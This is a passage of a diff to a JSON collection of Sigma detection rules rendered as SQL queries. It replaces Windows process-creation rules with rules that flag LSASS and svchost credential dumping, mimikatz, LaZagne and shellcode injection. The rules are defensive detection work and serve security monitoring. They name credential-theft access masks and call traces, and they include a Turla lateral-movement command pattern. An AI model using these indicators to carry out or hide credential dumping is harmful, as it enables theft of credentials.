'\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_service_path_modification.yml" + "filename": "proc_access_win_lsass_memdump.yml" }, { - "title": "Suspicious Splwow64 Without Params", - "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", - "status": "test", - "description": "Detects suspicious Splwow64.exe process without any command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "CMSTP Execution Process Access", + "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1218.003", + "attack.execution", + "attack.t1559.001", + "attack.g0069", + "attack.g0080", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE CallTrace LIKE '%cmlua.dll%' ESCAPE '\\'" ], - "filename": "proc_creation_win_splwow64_cli_anomaly.yml" + "filename": "proc_access_win_cmstp_execution_by_access.yml" }, { - "title": "SOURGUM Actor Behaviours", - "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", + "title": "SVCHOST Credential Dump", + "id": "174afcfa-6e40-4ae9-af64-496546389294", "status": "test", - "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", - "author": "MSTIC, FPT.EagleEye", + "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", + "author": "Florent Labouyrie", "tags": [ - "attack.t1546", - "attack.t1546.015", - "attack.persistence", - "attack.privilege_escalation" + "attack.t1548" ], "falsepositives": [ - "Unknown" + "Non identified legit exectubale" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((NewProcessName LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR NewProcessName LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_sourgrum.yml" + "filename": "proc_access_win_svchost_cred_dump.yml" }, { - "title": "Exploiting SetupComplete.cmd CVE-2019-1378", - "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", - "status": "test", - "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Credential Dumping by LaZagne", + "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", + "status": "stable", + "description": "Detects LSASS process access by LaZagne for credential dumping.", + "author": "Bhabesh Raj, Jonhnathan Ribeiro", "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.execution", - "attack.t1059.003", - "attack.t1574", - "cve.2019.1378" + "attack.credential_access", + "attack.t1003.001", + "attack.s0349" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_exploit_cve_2019_1378.yml" + "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" }, { - "title": "Regasm/Regsvcs Suspicious Execution", - "id": "cc368ed0-2411-45dc-a222-510ace303cb2", + "title": "Potential Shellcode Injection", + "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", "status": "experimental", - "description": "Detects suspicious execution of Regasm/Regsvcs utilities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.t1218.009" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" + "SELECT * FROM logs WHERE ((GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_regasm.yml" + "filename": "proc_access_win_shellcode_inject_msf_empire.yml" }, { - "title": "Suspect Svchost Activity", - "id": "16c37b52-b141-42a5-a3ea-bbe098444397", + "title": "LSASS Access from Program in Suspicious Folder", + "id": "fa34b441-961a-42fa-a100-ecc28c886725", "status": "experimental", - "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", - "author": "David Burkett, @signalblur", + "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" + "Updaters and installers are typical false positives. Apply custom filters depending on your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Roaming\\\\ViberPC\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\updater.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\') AND SourceImage LIKE '%\\\\AdobeARMHelper.exe' ESCAPE '\\' AND GrantedAccess = '0x1410')))" ], - "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" + "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" }, { - "title": "PUA - Nimgrab Execution", - "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", + "title": "Credential Dumping Tools Accessing LSASS Memory", + "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", "status": "experimental", - "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", - "author": "frack113", + "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", + "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002", + "car.2019-04-004" ], "falsepositives": [ - "Legitimate use of Nim on a developer systems" + "Likely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_nimgrab.yml" + "filename": "proc_access_win_cred_dump_lsass_access.yml" }, { - "title": "Renamed MegaSync Execution", - "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "title": "WerFault Accassing LSASS", + "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", "status": "test", - "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", - "author": "Sittikorn S", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Software that illegally integrates MegaSync in a renamed form", - "Administrators that have renamed MegaSync" + "Actual failures in lsass.exe that trigger a crash dump (unlikely)", + "Unknown cases in which WerFault accesses lsass.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'megasync.exe' AND NOT (NewProcessName LIKE '%\\\\megasync.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_renamed_megasync.yml" + "filename": "proc_access_win_lsass_werfault.yml" }, { - "title": "Turla Group Lateral Movement", - "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", - "status": "test", - "description": "Detects automated lateral movement by Turla group", - "author": "Markus Neis", + "title": "Suspicious LSASS Access Via MalSecLogon", + "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", + "status": "experimental", + "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", + "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059", - "attack.lateral_movement", - "attack.t1021.002", - "attack.discovery", - "attack.t1083", - "attack.t1135" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_turla_commands_critical.yml" + "filename": "proc_access_win_susp_seclogon.yml" }, { - "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", - "status": "experimental", - "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "LSASS Access from White-Listed Processes", + "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", + "status": "test", + "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Unlikely, since these tools shouldn't access lsass.exe at all" ], "level": "high", "rule": 